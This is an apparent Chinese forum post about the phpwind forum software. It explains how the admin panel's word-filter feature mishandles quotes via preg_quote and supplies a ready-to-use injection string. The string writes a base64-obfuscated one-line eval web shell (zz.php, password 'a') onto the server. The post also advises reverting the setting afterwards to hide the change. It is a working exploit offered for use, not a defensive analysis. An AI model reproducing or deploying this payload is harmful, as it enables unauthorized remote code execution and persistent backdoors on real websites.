phpwind 后台通用拿WEBSHELL
虽然这算不上什么好东西,但是当你要用他的时候就知道他的重要性了问题代码我帖一下
————————————-
foreach($content as $key=>$value){
list($w,$r)=explode(”=>”,$value);
$r = trim($r);
$w = explode(”|”,$w);
foreach($w as $k=>$v){
$v = preg_quote(trim($v),’/');
if(!isset($replace[$v]) && !isset($wordsfb[$v])){
$word[] = $v;
$rep[] = $r ? $r : $mrep;
}
}
————————————–
preg_quote这个函数会转义”\”,但是不转义”‘”
所以会出问题.比如我们提交”‘”会被转义成”\’”再经过他一转\\’
这样就出问题了
下面是具体的方法了
——————————-
直接进入后台修改词语过滤功能:
直接在新增词语中写入下列的语句:
‘,fputs(fopen(base64_decode(”enoucGhw”),”w”),base64_decode(”PD9ldmFsKCRfUE9TVFthXSk7Pz4=”)),’a
另外一个可以随便填写
缺点就是要出错,但是可以拿SHELL
拿了SHELL马上修改回来就没有问题了
上面的会代码会在当前的目录生成一个zz.php,密码是a的一句话
根据自己的需要修改base64_decode函数里面的值就可以了
该文是Lenk老大发出来的,不知道是不是他本人所作的..无论怎么样都要支持他,因为他是一个好老大...
页:
[1]